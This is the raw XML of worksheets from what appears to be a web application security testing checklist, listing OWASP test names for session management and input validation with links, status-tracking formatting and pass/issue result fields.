eight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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customHeight="1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2.75" customHeight="1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2.75" customHeight="1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2.75" customHeight="1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2.75" customHeight="1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</sheetData>
  <autoFilter ref="A3:J8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6" type="noConversion"/>
  <conditionalFormatting sqref="H5:H8">
    <cfRule type="cellIs" dxfId="227" priority="16" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H8">
    <cfRule type="cellIs" dxfId="226" priority="17" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H8">
    <cfRule type="cellIs" dxfId="225" priority="18" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13:H16 I5:J8 I17:J937 I1:J2 I10:J12">
    <cfRule type="containsText" dxfId="224" priority="19" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13:H16 I5:J8 I17:J937 I1:J2 I10:J12">
    <cfRule type="containsText" dxfId="223" priority="20" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13:H16 I5:J8 I17:J937 I1:J2 I10:J12">
    <cfRule type="containsText" dxfId="222" priority="21" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="221" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="220" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="219" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="218" priority="10" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="217" priority="11" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A15">
    <cfRule type="cellIs" dxfId="216" priority="12" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A16">
    <cfRule type="cellIs" dxfId="215" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A16">
    <cfRule type="cellIs" dxfId="214" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A16">
    <cfRule type="cellIs" dxfId="213" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="212" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="211" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="210" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9:J9">
    <cfRule type="containsText" dxfId="209" priority="4" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I9))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9:J9">
    <cfRule type="containsText" dxfId="208" priority="5" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I9))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9:J9">
    <cfRule type="containsText" dxfId="207" priority="6" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I9))))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H9" xr:uid="{12C0E9B0-9B63-E84C-A905-E031C6D298C1}">
      <formula1>$A$14:$A$16</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A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7B170-A63A-2449-B5F9-715376741AE1}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB942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70.4257812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222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63.95">
      <c r="A5" s="7" t="s">
        <v>223</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>224</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema", "Testing for Session Management Schema")</f>
        <v>Testing for Session Management Schema</v>
      </c>
      <c r="D5" s="53" t="s">
        <v>225</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>226</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>227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63.95">
      <c r="A6" s="7" t="s">
        <v>228</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>229</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes", "Testing for Cookies Attributes")</f>
        <v>Testing for Cookies Attributes</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>230</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>94</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>231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48">
      <c r="A7" s="7" t="s">
        <v>232</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>233</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/03-Testing_for_Session_Fixation", "Testing for Session Fixation")</f>
        <v>Testing for Session Fixation</v>
      </c>
      <c r="D7" s="53" t="s">
        <v>234</v>
      </c>
      <c r="E7" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>235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63.95">
      <c r="A8" s="7" t="s">
        <v>236</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>237</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/04-Testing_for_Exposed_Session_Variables", "Testing for Exposed Session Variables")</f>
        <v>Testing for Exposed Session Variables</v>
      </c>
      <c r="D8" s="54" t="s">
        <v>238</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>239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8">
      <c r="A9" s="7" t="s">
        <v>240</v>
      </c>
      <c r="B9" s="27" t="s">
        <v>241</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery", "Testing for Cross Site Request Forgery")</f>
        <v>Testing for Cross Site Request Forgery</v>
      </c>
      <c r="D9" s="54" t="s">
        <v>242</v>
      </c>
      <c r="E9" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>27</v>
      </c>
      <c r="G9" s="12" t="s">
        <v>243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2.1">
      <c r="A10" s="7" t="s">
        <v>244</v>
      </c>
      <c r="B10" s="27" t="s">
        <v>245</v>
      </c>
      <c r="C10" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/06-Testing_for_Logout_Functionality", "Testing for Logout Functionality")</f>
        <v>Testing for Logout Functionality</v>
      </c>
      <c r="D10" s="53" t="s">
        <v>246</v>
      </c>
      <c r="E10" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F10" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G10" s="12" t="s">
        <v>247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2.1">
      <c r="A11" s="7" t="s">
        <v>248</v>
      </c>
      <c r="B11" s="27" t="s">
        <v>249</v>
      </c>
      <c r="C11" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/07-Testing_Session_Timeout", "Testing Session Timeout")</f>
        <v>Testing Session Timeout</v>
      </c>
      <c r="D11" s="54" t="s">
        <v>250</v>
      </c>
      <c r="E11" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F11" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G11" s="12" t="s">
        <v>247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48">
      <c r="A12" s="7" t="s">
        <v>251</v>
      </c>
      <c r="B12" s="27" t="s">
        <v>252</v>
      </c>
      <c r="C12" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/08-Testing_for_Session_Puzzling", "Testing for Session Puzzling")</f>
        <v>Testing for Session Puzzling</v>
      </c>
      <c r="D12" s="53" t="s">
        <v>253</v>
      </c>
      <c r="E12" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G12" s="12" t="s">
        <v>254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2.1">
      <c r="A13" s="7" t="s">
        <v>255</v>
      </c>
      <c r="B13" s="27" t="s">
        <v>256</v>
      </c>
      <c r="C13" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking", "Testing for Session Hijacking")</f>
        <v>Testing for Session Hijacking</v>
      </c>
      <c r="D13" s="53" t="s">
        <v>257</v>
      </c>
      <c r="E13" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F13" s="12" t="s">
        <v>258</v>
      </c>
      <c r="G13" s="12" t="s">
        <v>100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48">
      <c r="A14" s="7" t="s">
        <v>259</v>
      </c>
      <c r="B14" s="27" t="s">
        <v>260</v>
      </c>
      <c r="C14" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/10-Testing_JSON_Web_Tokens", "Testing JSON Web Tokens")</f>
        <v>Testing JSON Web Tokens</v>
      </c>
      <c r="D14" s="53" t="s">
        <v>261</v>
      </c>
      <c r="E14" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F14" s="12" t="s">
        <v>147</v>
      </c>
      <c r="G14" s="12" t="s">
        <v>262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9"/>
      <c r="B15" s="20"/>
      <c r="C15" s="21"/>
      <c r="D15" s="21"/>
      <c r="E15" s="19"/>
      <c r="F15" s="19"/>
      <c r="G15" s="19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>
      <c r="A17" s="23"/>
      <c r="B17" s="23"/>
      <c r="C17" s="24"/>
      <c r="D17" s="24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95">
      <c r="A18" s="25" t="s">
        <v>57</v>
      </c>
      <c r="B18" s="20"/>
      <c r="C18" s="21"/>
      <c r="D18" s="21"/>
      <c r="E18" s="22"/>
      <c r="F18" s="22"/>
      <c r="G18" s="22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8" ht="15.95">
      <c r="A19" s="12" t="s">
        <v>58</v>
      </c>
      <c r="B19" s="20"/>
      <c r="C19" s="21"/>
      <c r="D19" s="21"/>
      <c r="E19" s="22"/>
      <c r="F19" s="22"/>
      <c r="G19" s="22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8" ht="15.95">
      <c r="A20" s="12" t="s">
        <v>59</v>
      </c>
      <c r="B20" s="20"/>
      <c r="C20" s="21"/>
      <c r="D20" s="21"/>
      <c r="E20" s="22"/>
      <c r="F20" s="22"/>
      <c r="G20" s="22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8" ht="15.95">
      <c r="A21" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B21" s="20"/>
      <c r="C21" s="21"/>
      <c r="D21" s="21"/>
      <c r="E21" s="22"/>
      <c r="F21" s="22"/>
      <c r="G21" s="22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8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</sheetData>
  <autoFilter ref="A3:J12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6" type="noConversion"/>
  <conditionalFormatting sqref="H5:H12">
    <cfRule type="cellIs" dxfId="206" priority="22" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H12">
    <cfRule type="cellIs" dxfId="205" priority="23" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H5:H12">
    <cfRule type="cellIs" dxfId="204" priority="24" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J12 I22:J942 I1:J2 I15:J17">
    <cfRule type="containsText" dxfId="203" priority="25" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J12 I22:J942 I1:J2 I15:J17">
    <cfRule type="containsText" dxfId="202" priority="26" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H18:H21 I5:J12 I22:J942 I1:J2 I15:J17">
    <cfRule type="containsText" dxfId="201" priority="27" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(H1))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="200" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="199" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19">
    <cfRule type="cellIs" dxfId="198" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="197" priority="16" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="196" priority="17" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A20">
    <cfRule type="cellIs" dxfId="195" priority="18" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="194" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="193" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A21">
    <cfRule type="cellIs" dxfId="192" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13">
    <cfRule type="cellIs" dxfId="191" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13">
    <cfRule type="cellIs" dxfId="190" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H13">
    <cfRule type="cellIs" dxfId="189" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I13:J13">
    <cfRule type="containsText" dxfId="188" priority="10" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I13))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I13:J13">
    <cfRule type="containsText" dxfId="187" priority="11" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I13))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I13:J13">
    <cfRule type="containsText" dxfId="186" priority="12" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I13))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="185" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="184" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H14">
    <cfRule type="cellIs" dxfId="183" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="182" priority="4" operator="containsText" text="Not started">
      <formula>NOT(ISERROR(SEARCH(("Not started"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="181" priority="5" operator="containsText" text="In progress">
      <formula>NOT(ISERROR(SEARCH(("In progress"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:J14">
    <cfRule type="containsText" dxfId="180" priority="6" operator="containsText" text="Done">
      <formula>NOT(ISERROR(SEARCH(("Done"),(I14))))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H5:H14" xr:uid="{75FD8E61-D1A8-1346-9CF0-61D8AE070194}">
      <formula1>$A$19:$A$21</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0" footer="0"/>
  <pageSetup orientation="portrait"/>
  <ignoredErrors>
    <ignoredError sqref="A5:A1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86C0-8D29-9B4A-BB6F-87755565D56E}">
  <sheetPr>
    <tabColor rgb="FFA5A5A5"/>
  </sheetPr>
  <dimension ref="A1:AB952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2.95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74.85546875" style="2" customWidth="1"/>
    <col min="5" max="5" width="14.140625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18.95">
      <c r="A1" s="87" t="s">
        <v>263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32.1">
      <c r="A5" s="7" t="s">
        <v>264</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>265</v>
      </c>
      <c r="C5" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting", "Testing for Reflected Cross Site Scripting")</f>
        <v>Testing for Reflected Cross Site Scripting</v>
      </c>
      <c r="D5" s="53" t="s">
        <v>266</v>
      </c>
      <c r="E5" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>268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32.1">
      <c r="A6" s="7" t="s">
        <v>269</v>
      </c>
      <c r="B6" s="27" t="s">
        <v>270</v>
      </c>
      <c r="C6" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting", "Testing for Stored Cross Site Scripting")</f>
        <v>Testing for Stored Cross Site Scripting</v>
      </c>
      <c r="D6" s="53" t="s">
        <v>271</v>
      </c>
      <c r="E6" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>268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7.100000000000001">
      <c r="A7" s="7" t="s">
        <v>272</v>
      </c>
      <c r="B7" s="27" t="s">
        <v>273</v>
      </c>
      <c r="C7" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_HTTP_Verb_Tampering", "Testing for HTTP Verb Tampering")</f>
        <v>Testing for HTTP Verb Tampering</v>
      </c>
      <c r="D7" s="49" t="s">
        <v>274</v>
      </c>
      <c r="E7" s="56" t="s">
        <v>15</v>
      </c>
      <c r="F7" s="50" t="s">
        <v>15</v>
      </c>
      <c r="G7" s="50" t="s">
        <v>15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2.1">
      <c r="A8" s="7" t="s">
        <v>275</v>
      </c>
      <c r="B8" s="27" t="s">
        <v>276</v>
      </c>
      <c r="C8" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution", "Testing for HTTP Parameter Pollution")</f>
        <v>Testing for HTTP Parameter Pollution</v>
      </c>
      <c r="D8" s="54" t="s">
        <v>277</v>
      </c>
      <c r="E8" s="11" t="s">
        <v>44</v>
      </c>
      <c r="F8" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G8" s="12" t="s">
        <v>278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48">
      <c r="A9" s="7" t="s">
        <v>279</v>
      </c>
      <c r="B9" s="27" t="s">
        <v>280</v>
      </c>
      <c r="C9" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection", "Testing for SQL Injection")</f>
        <v>Testing for SQL Injection</v>
      </c>
      <c r="D9" s="54" t="s">
        <v>281</v>
      </c>
      <c r="E9" s="11" t="s">
        <v>282</v>
      </c>
      <c r="F9" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G9" s="12" t="s">
        <v>283</v>
      </c>
      <c r="H9" s="12"/>
      <c r="I9" s="13"/>
      <c r="J9" s="14" t="s">
        <v>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80.099999999999994">
      <c r="A10" s="7" t="s">
        <v>284</v>
      </c>
      <c r="B10" s="27" t="s">
        <v>285</v>
      </c>
      <c r="C10" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection", "Testing for LDAP Injection")</f>
        <v>Testing for LDAP Injection</v>
      </c>
      <c r="D10" s="53" t="s">
        <v>286</v>
      </c>
      <c r="E10" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F10" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G10" s="12" t="s">
        <v>287</v>
      </c>
      <c r="H10" s="12"/>
      <c r="I10" s="13"/>
      <c r="J10" s="14" t="s">
        <v>16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3.95">
      <c r="A11" s="7" t="s">
        <v>288</v>
      </c>
      <c r="B11" s="27" t="s">
        <v>289</v>
      </c>
      <c r="C11" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection", "Testing for XML Injection")</f>
        <v>Testing for XML Injection</v>
      </c>
      <c r="D11" s="53" t="s">
        <v>290</v>
      </c>
      <c r="E11" s="18" t="s">
        <v>291</v>
      </c>
      <c r="F11" s="33" t="s">
        <v>94</v>
      </c>
      <c r="G11" s="33" t="s">
        <v>292</v>
      </c>
      <c r="H11" s="12"/>
      <c r="I11" s="13"/>
      <c r="J11" s="14" t="s">
        <v>16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63.95">
      <c r="A12" s="7" t="s">
        <v>293</v>
      </c>
      <c r="B12" s="27" t="s">
        <v>294</v>
      </c>
      <c r="C12" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection", "Testing for SSI Injection")</f>
        <v>Testing for SSI Injection</v>
      </c>
      <c r="D12" s="53" t="s">
        <v>295</v>
      </c>
      <c r="E12" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F12" s="12" t="s">
        <v>267</v>
      </c>
      <c r="G12" s="12" t="s">
        <v>296</v>
      </c>
      <c r="H12" s="12"/>
      <c r="I12" s="13"/>
      <c r="J12" s="14" t="s">
        <v>16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63.95">
      <c r="A13" s="7" t="s">
        <v>297</v>
      </c>
      <c r="B13" s="27" t="s">
        <v>298</v>
      </c>
      <c r="C13" s="9" t="str">
        <f>HYPERLINK("https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection", "Testing for XPath Injection")</f>
        <v>Testing for XPath Injection</v>
      </c>
      <c r="D13" s="53" t="s">
        <v>299</v>
      </c>
      <c r="E13" s="18" t="s">
        <v>44</v>
      </c>
      <c r="F13" s="12" t="s">
        <v>267</v>
      </c>
